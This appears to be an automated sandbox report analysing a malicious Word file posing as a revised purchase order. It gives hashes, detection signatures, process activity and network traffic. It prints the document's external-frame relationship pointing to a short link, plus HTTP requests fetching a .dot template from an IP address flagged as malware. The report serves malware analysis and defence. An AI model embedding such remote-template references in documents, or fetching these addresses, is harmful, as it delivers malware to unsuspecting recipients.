Loading ...

Play interactive tourEdit tour

Analysis Report Revised_PO_758869.docx

Overview

General Information

Sample Name:Revised_PO_758869.docx
Analysis ID:405914
MD5:bd5e0d325783b0526ae79b58fe08ee77
SHA1:c066447df75901430365317b71d21369edf340f6
SHA256:69ba01eb1fe057757516dbc89211b3990fefe9b894f0594af2ccebe500442202
Tags:docx
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains an external reference to another document
Multi AV Scanner detection for submitted file
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5776 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5984 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://107.173.219.80/prf/regasm.dotAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Revised_PO_758869.docxVirustotal: Detection: 23%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 185.255.55.12:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.255.55.12:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: global trafficDNS query: name: u.nu
Source: global trafficTCP traffic: 192.168.2.5:49713 -> 185.255.55.12:443
Source: global trafficTCP traffic: 192.168.2.5:49713 -> 185.255.55.12:443
Source: Joe Sandbox ViewIP Address: 107.173.219.80 107.173.219.80
Source: Joe Sandbox ViewASN Name: XTOMxTomEU XTOMxTomEU
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global trafficHTTP traffic detected: GET /prf/regasm.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: unknownTCP traffic detected without corresponding DNS query: 107.173.219.80
Source: global trafficHTTP traffic detected: GET /prf/regasm.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 107.173.219.80
Source: unknownDNS traffic detected: queries for: u.nu
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 May 2021 12:46:01 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.aadrm.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.cortana.ai
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.office.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.onedrive.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://augloop.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://augloop.office.com/v2
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cdn.entity.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://clients.config.office.net/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://config.edge.skype.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cortana.ai
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cortana.ai/api
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://cr.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dev.cortana.ai
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://devnull.onenote.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://directory.services.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://graph.windows.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://graph.windows.net/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://lifecycle.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://login.windows.local
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://management.azure.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://management.azure.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://messaging.office.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ncus.contentsync.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://officeapps.live.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://onedrive.live.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://outlook.office.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://outlook.office365.com/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://powerlift.acompli.net
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://settings.outlook.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://staging.cortana.ai
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://tasks.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://webshell.suite.office.com
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://wus2.contentsync.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: A565DB19-BB03-40E7-A14A-DE7903488E69.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 185.255.55.12:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.255.55.12:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal64.evad.winDOCX@3/13@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{1309A0C3-9267-49B4-9EDD-8931F9A6178D} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Revised_PO_758869.docxVirustotal: Detection: 23%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Persistence and Installation Behavior:

barindex
Contains an external reference to another documentShow sources
Source: webSettings.xml.relsBinary or memory string: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="https://u.nu/311s3" TargetMode="External"/></Relationships>
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
